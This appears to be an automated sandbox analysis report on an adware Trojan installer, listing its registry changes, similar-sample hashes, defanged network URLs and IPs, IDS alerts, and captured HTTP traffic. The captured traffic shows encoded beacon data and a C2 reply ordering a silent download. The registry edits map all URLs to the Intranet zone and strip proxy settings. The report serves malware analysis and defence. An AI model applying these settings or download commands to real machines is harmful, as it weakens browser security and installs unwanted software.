[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"__cxe_type" = ".10100019"
"CAD4DBA9766467bducob23" = "18000000"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc" = "UA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc_Expiration" = "1441945355227"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D8 35 F4 E4 60 CD EF 9C B0 F1 DC 25 A7 F1 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467evaob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"E419E2445BF82ob23" = "300000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process taedko.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB A5 16 D9 CC AE C9 5D 14 0C DD F9 21 73 C3 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dag17797.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015090820150909\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePrefix" = ":2015090820150909:"

"CacheRepair" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3B 7A 7A 17 03 FA 6D 1F B5 6E BA 76 AD 76 E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.31
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.31
File Description:
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 287
05a7d3434a4f7fdbf0701537409ba2c8
28b85a68ade122e0932bc011d2e4741e
85384e1d38290e1be1b941708ef98de7
90c45221acad769be1f420e26fb96e4e
3e9501bc32b06042e7bcccdf0669fafa
99bbb5f56a0e982061037a96fd219d2e
167d6007985099cb7013fbf1130a54b3
d77835ac151ab2189ea5019f70e1dc9e
c2b1c2a1b9eeb54404eab8ffaac8ab3d
a901bec47b03673fb1dbb3071e83a05f
bcf2db92c2535d1f05c86a8706618c3c
2d6a16c59156f3d26a0161fa787d5ecb
6a17857090567191d9d5407fb1be7a60
14ad705a1481ad0fac61ac3380f71743
4dcc650e7da22e29ee760ae17093af75
63e751baab159c93c34296d8a60d605a
ce32769a77e3a5231c15f461eddfc257
df58c89f399dc0e07adb04521036be4c
e3df55b2211eca7c68f70aff300b5de1
21652c1165a4cc603f5755d9996b329d
083cd9d058cf091f0d2ff94d2183e254
75f54e31f102aa950f332c5557e0b6ae
cee30d0a7c755a06d734276fb2f8b21b
38926abc005c6822d288bee19dc5ed9b
383860ca1a012fc8db9189d1ffb6e360

URLs

URL	IP
hxxp://ghs.googlehosted.com/rp/v/image.jpg
hxxp://ghs.googlehosted.com/wrp/ri
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141
hxxp://dildmbfdhsxh6.cloudfront.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81
hxxp://ghs.googlehosted.com/up/v/update
hxxp://cojun15cart.com/download.php?kHmDdWc=
hxxp://cds.i9x9t3x4.hwcdn.net/testadsreel_10656.exe
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_12_HD.zip
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_422.zip
hxxp://dildmbfdhsxh6.cloudfront.net/core/ammapp.js?x=1&cb=1441686154118&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/lgv.js?r=9&cb=1441686154352&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81
hxxp://s3.zawss.info/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132	54.231.18.192
hxxp://cdn.austries.com/up/v/update	64.233.166.121
hxxp://s.xcodelib.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81	54.230.200.28
hxxp://s10100019.xcodelib.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81	54.230.200.81
hxxp://www.cojun15cart.com/download.php?kHmDdWc=	23.22.255.164
hxxp://s.xcodelib.net/core/ammapp.js?x=1&cb=1441686154118&yt=81	54.230.200.28
hxxp://secured.nmsgv.us/testadsreel_10656.exe	69.16.175.42
hxxp://s.xcodelib.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81	54.230.200.28
hxxp://s.xcodelib.net/core/lgv.js?r=9&cb=1441686154352&yt=81	54.230.200.28
hxxp://cdn.austries.com/rp/v/image.jpg	64.233.166.121
hxxp://s3.zawss.info/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132	54.231.18.192
hxxp://s3.zawss.info/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141	54.231.18.192
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php	50.97.62.154
hxxp://s.xcodelib.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81	54.230.200.28
hxxp://s.xcodelib.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81	54.230.200.28
hxxp://cdn.austries.com/wrp/ri	64.233.166.121
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip	69.16.175.42
hxxp://s.xcodelib.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81	54.230.200.28
hxxp://secured.nmsgv.us/os/rm/OfferScreen_422.zip	69.16.175.42
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php	50.97.62.154
www.xcodelib.net	107.21.244.247

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Data POST to an image file (jpg)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallMonetizer.Adware Beacon 2

Traffic

GET /download.php?kHmDdWc= HTTP/1.1

Host: VVV.cojun15cart.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Date: Tue, 08 Sep 2015 04:22:23 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Cache-Control: no-cache, must-revalidate

Content-Disposition: attachment; filename="InstallMonetizer.exe"

Location: hXXp://secured.nmsgv.us/testadsreel_10656.exe

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 400

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1J&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:17 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:1
7 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;....


POST /up/v/update HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 420

Connection: Keep-Alive

key=jZKJflaOiX16jX4/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT97joJ9VkpJST+QhI2GVkpNP4WNhlZJUXhJUnhJUHhLS3hLTz98e1ZKTU1KT1FPSk1PP5FWTUlR&x=1
HTTP/1.1 200 OK

Content-type: text/plain

Date: Tue, 08 Sep 2015 04:22:22 GMT

Server: Google Frontend

Cache-Control: private

Accept-Ranges: none

Vary: Accept-Encoding

Transfer-Encoding: chunked
86..<runonce><runid>4006WIM20150908</runid><silen
t>yes</silent><url>hXXp://VVV.cojun15cart.com/download.
php?kHmDdWc=</url></runonce>....0..HTTP/1.1 200 OK..Conten
t-type: text/plain..Date: Tue, 08 Sep 2015 04:22:22 GMT..Server: Googl
e Frontend..Cache-Control: private..Accept-Ranges: none..Vary: Accept-
Encoding..Transfer-Encoding: chunked..86..<runonce><runid>
4006WIM20150908</runid><silent>yes</silent><url&g
t;hXXp://VVV.cojun15cart.com/download.php?kHmDdWc=</url></run
once>....0..

GET /core/ammapp.js?x=1&cb=1441686154118&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 1470

Connection: keep-alive

Date: Mon, 07 Sep 2015 20:21:16 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 20:21:16 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 29217

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: OUjlVNVWrwWqS5UHlwhs6jHawXq6NVa9ifQH-SpoIt0RqZCClnuX6A==
...........WkS.8.. A....8...WeX^...-.mg:..,...........{%..CB.e..K:..s_
bDD..../../.F...Q.9.(.w.....9............C......i.i..........O."..~H..
;|....AW..~oo.|....Q.|..{.;..L...S}......S.].<.S........L.e..I.S...
c6.......8.J...O.C..{....{.t._..{......d6.D..U.....3e.o...\<..L.m.O
...d.}[email protected]#.m4...I..).....I..{_...;r.Vh.l.R>.B....h~...^G]...
[email protected].>\Q?.=%...$)...1..c...\.L.......^.d.%......I.._4.or......
x.J'....P...N.j.u....4KC._.F.......-..1....... ..i~70B......B..d.... .
bs..Z}..:.g..o...|...L....5.D~8..uz.Uq..r.u....B...U.....u....e'9\.b..
...K..#.^D\~N.(N...0..:!...?"7.i$..i.....7......~..m.zZ.:...A&U.k....6
n......?.D...%.....U..2....R..@.^......g.N...y..N^.P..q,.5.?...m......
"....|..../.l..I.;.. D.Qu... .`.-...,..Vf.._......L.........I.Z.`i.q..
.2.............1*a..q.....2#.x[m=.9w.<..4DBI....$...........\P....s
..>..l....).>....).........<....U3..R.(....F.4.nn.... EJ.....
..).....).U... ..s........{..;....0..J".A.(..Z...r...|.:S.k..........;
....{....8..m#?..9...C'..<`..1.<<=....1.......;.u...u....t.C.
...6.R.....>...w.!........5.4...l....{....*........r.Z....9......n.
Sf..)]..D..........]f.u...E.....7..=.,.qBhg.&..Z 0...wu.@.....^...3.9.
.LA..])......&%.e/..\../.^.$ .....R..z|MBh.....s` O..V'....9z.5z.Y....
'Y.P..O....'...$'.....o...f.M..o...F..V.tKE.....Si..U..v..4*.$Lp_.U...
s;.........}.._.a....1.N.c.5..*...j..4Q.7.R..............TQ.....M...2f
k$V...U!?..D.].<a....?P...P%IZ`',..J.w...L.C?...tH....].).4k.h |X'.
z....h.6!?!^..d.....hK3..k.N....X..........
<<< skipped >>>

GET /core/lgv.js?r=9&cb=1441686154352&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 102

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:20:57 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=900

Expires: Tue, 08 Sep 2015 04:35:57 GMT

Content-Encoding: gzip

Age: 437

Vary: Accept-Encoding

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 55gZ6s2yXPBD0WAPSlZdaNfJROtUR5fnPbuRP_a2P5C-uuxRG3anAQ==
...........H .K........)....O../.U2LML3II.4251NK3N1NI.4I3.44.0M4.0OLR.
..MN#NumrbIr.F.fum....5.$...z.......


GET /core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 3070

Connection: keep-alive

Date: Mon, 07 Sep 2015 12:57:48 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 12:57:48 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 55825

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: YknyOl6Reueyt-IqpzowiZxk9Ed0BKy261VruzTlyP3kGbOikTYnoA==
............is......>..hJr.g...W.6...$.$.......=...(....x.9...C....
..^.Kw4.Y.q.V.kq.D..D. ...X$..>|9..."viz@...`.......N)....,.X.ON./'
......o...~.....g..?{.7"c..0..d..O..ON.s...~...tf..............EZ....o
d.Z ...J.x0X...=...#.N...V..y8?Z9_...u...1..D..z........x&..4..k.9O...
..X..i.q.f<..........\d..?..k......E..k~/.a......O.......N@u.".M.2.
A[8.M.r..V.....4^p.H6...4......tC..Y....c...Q.B.3...-O.oZ..Z...X(. r.?
O..........g.:.....(Q<.G......e..S"............U....o...F..EK.wX...
.E*'.~...@@.RAO?N..!...b..X.5....>...Z.8$..G......e..........L.\...
.%U}.^....d6..k.....#.R.AT.l...~..6.......A...45.>.#}C...D...i.....
..M.r.4.f..}..)..S... *....,m~....~....3....^..P.)]h.....?..x.W...s...
......]s..5\d.S..u.6.h..6.u...9O.....E;w{......6nQ.....!.g...u|i......
. ......u2!.. ..YW........?'.. ...krFPI...v.....o.8....poT....*.*..C..
yZ......G....S.. .H..U......$......._2.....w]..X..W....n%.T.......N~I.
......A.X.4.;.1D6............1Ad-./m!..wlYPos-./1&.^....<.....i.NG.
.CpU.........%.mD..X........8.......4.K.}...L.t..$.Ri31...G..-_9.9..|~
.(qo....=.r..>.1.H.3...H...U..Q.E1..z..E.e:.j.f..l........A...o...9
...x)....G....E.."...=.x"m)^.%OOh......p.R.T*K...mk..,.-..w..0..62...3
..4j!..nF.W0x.ys.......9./H.....~E=...o......f......@g.......!. .:'.[2
.X..S.F....6.=(...u.l]..`..%[email protected]......|;..."r.S...V.*.5@...~....
.......H....Y.K....3T5..,..1;^][email protected]....'.c........W..~....
